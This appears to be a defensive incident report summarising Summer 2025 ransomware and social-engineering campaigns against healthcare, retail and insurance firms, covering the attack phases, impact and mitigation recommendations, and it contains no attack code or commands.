Full Report
Can your defenses withstand the biggest attacks of Summer 2025? From Interlock's FileFix to Qilin, Scattered Spider, and ToolShell exploits—simulate them all against your organization's defenses with Picus Security Validation Platform to find gaps before attackers do. [...]
Analysis Summary
# Incident Report: Summer 2025 Multi-Sector Cyber Campaign Analysis
## Executive Summary
Summer 2025 was marked by a high volume of diverse, impactful cyberattacks across the Healthcare, Retail, and Insurance sectors, primarily driven by ransomware groups (Interlock, Qilin, DragonForce) and sophisticated social engineering actors (Scattered Spider). Initial access frequently utilized zero-day vulnerabilities (Fortinet) and social engineering (MFA fatigue, phishing). The primary impact involved widespread data exfiltration (EHRs, PII, financial records) and operational disruption via ransomware encryption. Response focused on containment, system restoration, and heightened security awareness training.
## Incident Details
- Discovery Date: Varies (e.g., Aflac detected access on June 12, 2025; Rhysida leak initiated July 8, 2025)
- Incident Date: Spring/Summer 2025 (spanning June–July 2025 for major reported events)
- Affected Organization: Florida Hand Center, Louis Vuitton, Belk, Aflac, Erie Insurance, Philadelphia Insurance Companies, Hospitals (various)
- Sector: Healthcare (HPH), Retail, Insurance, Financial
- Geography: Primarily US (Florida, North Carolina) and UK
## Timeline of Events
### Initial Access
- **June 2025 (Qilin):** Exploitation of unpatched Fortinet vulnerabilities (CVE-2024-21762 and CVE-2024-55591) used to gain entry into healthcare organizations.
- **April–May 2025 (Scattered Spider):** Identity-centric social engineering, including voice phishing, MFA fatigue, and help-desk impersonation against retailers and later insurance firms.
- **H1 2025 (ToolShell Campaign):** Exploitation of unpatched on-prem SharePoint servers.
- **July 22, 2025 (Interlock Advisory):** Interlock group noted for using "FileFix," a PowerShell launcher obfuscated via decoy file paths, targeting users via File Explorer.
### Lateral Movement
- **Qilin:** Lateral movement after initial access to deploy ransomware and exfiltrate data (EHRs, insurance records).
- **Interlock:** Implicit lateral movement following PowerShell execution using FileFix.
### Data Exfiltration/Impact
- **July 8, 2025 (Rhysida):** Leaked medical images, driver's licenses, and insurance forms from Florida Hand Center after non-payment.
- **May 7–11, 2025 (DragonForce):** Exfiltrated 156 GB of customer/employee data, including SSNs, from Belk.
- **June 2025 (Scattered Spider):** Compromise of customer and employee data, including SSNs and health claims (Aflac). No ransomware deployed, but operational downtime reported at insurance firms.
### Detection & Response
- **Detection:** CISA/FBI/HHS issued advisory regarding Interlock on July 22, 2025. Aflac detected unauthorized access on June 12, 2025.
- **Response (General):** Security teams struggled to keep pace with exploit chains. Actions included patching critical infrastructure, re-securing help desks, and handling data leak negotiations (e.g., Rhysida threat deadline).
## Attack Methodology
| Phase | Method(s) Used |
| :--- | :--- |
| **Initial Access** | Exploitation of Fortinet vulnerabilities (CVE-2024-21762, CVE-2024-55591), PowerShell launching via "FileFix" (Interlock), Identity Social Engineering (MFA Fatigue, Help-desk Impersonation, Typosquatted Domains). |
| **Persistence** | Implied persistence via ransomware deployment (Qilin, DragonForce, Interlock). |
| **Privilege Escalation** | Not explicitly detailed, but required for successful lateral movement and data staging by ransomware groups. |
| **Defense Evasion** | Obfuscation via PowerShell loaders that hide scripts behind decoy file paths ("FileFix"); exploitation of unknown or unpatched firmware/software (e.g., SharePoint). |
| **Credential Access** | Identity-centric pivoting via MFA fatigue and help-desk impersonation (Scattered Spider). |
| **Discovery** | Standard reconnaissance implied prior to or during lateral movement. |
| **Lateral Movement** | Implied by successful deployment of ransomware across victim networks (Qilin, DragonForce). |
| **Collection** | Gathering of EHRs, insurance records, PII (SSNs), employee data, and medical images. |
| **Exfiltration** | Direct data transfer following compromise, leading to public leak sites upon non-payment. |
| **Impact** | System encryption (Ransomware) and data extortion via "Call Lawyer" features and automated negotiation tools (Qilin). |
## Impact Assessment
- **Financial:** Ransom payments likely occurred; costs associated with breach notification, remediation, and potential litigation (unquantified).
- **Data Breach:** High volume of sensitive data compromised, including medical images, SSNs, health claims, purchase histories, PII, and HR files.
- **Operational:** Significant operational downtime reported by insurance companies; urgent disruption risk in healthcare due to ransomware targeting care delivery urgency.
- **Reputational:** Damage to major global brands including Louis Vuitton (third breach in a quarter) and major US retailers/insurers.
## Indicators of Compromise
*Note: Specific IOCs were not detailed in the text and are generally omitted here, referencing TTPs instead.*
- **Network indicators:** Traffic associated with exploitation of Fortinet CVEs.
- **File indicators:** Use of PowerShell leveraging the "FileFix" technique.
- **Behavioral indicators:** Excessive help-desk interaction attempts, rapid privilege escalation post-initial access, and PowerShell abuse bypassing standard security monitoring.
## Response Actions
- **Containment:** Isolation of affected systems; halting immediate threat activity (Aflac contained unauthorized access).
- **Eradication:** (Implied) Rebuilding systems; cleaning persistence mechanisms deployed by ransomware actors.
- **Recovery:** Restoring operations, particularly critical functions in healthcare environments where downtime is unacceptable.
## Lessons Learned
- **Exploit Chains Matter:** Attackers targeted known vulnerabilities (Fortinet CVEs) but also leveraged overlooked infrastructure (unpatched on-prem SharePoint).
- **Identity is the Primary Vector:** Social engineering, MFA fatigue, and help-desk manipulation proven highly effective over traditional malware delivery for certain high-value actors (Scattered Spider).
- **Ransomware Evolving:** Groups like Qilin are layering extortion tactics (legal themes, automated negotiation) to increase payout pressure beyond simple encryption.
## Recommendations
- **Patching Strategy Overhaul:** Prioritize CISA KEV entries and high-severity CVEs, and implement validation testing to confirm whether specific vulnerabilities are exploitable in the environment, focusing on exploit chains.
- **Harden Identity Controls:** Immediately implement mitigation strategies against social engineering attacks, including reinforcing help-desk verification procedures and limiting privileged access.
- **Human Firewall Testing:** Conduct frequent, realistic phishing and social engineering simulations, tailoring scenarios to known Lures (e.g., Voice phishing, MFA fatigue).
- **Behavioral Monitoring:** Deploy and tune monitoring for post-exploitation activity, specifically PowerShell abuse, credential theft, and stealthy data staging/exfiltration techniques.
- **Legacy System Audit:** Isolate or replace all ignored, unmonitored, or outdated on-premise infrastructure (e.g., legacy SharePoint servers).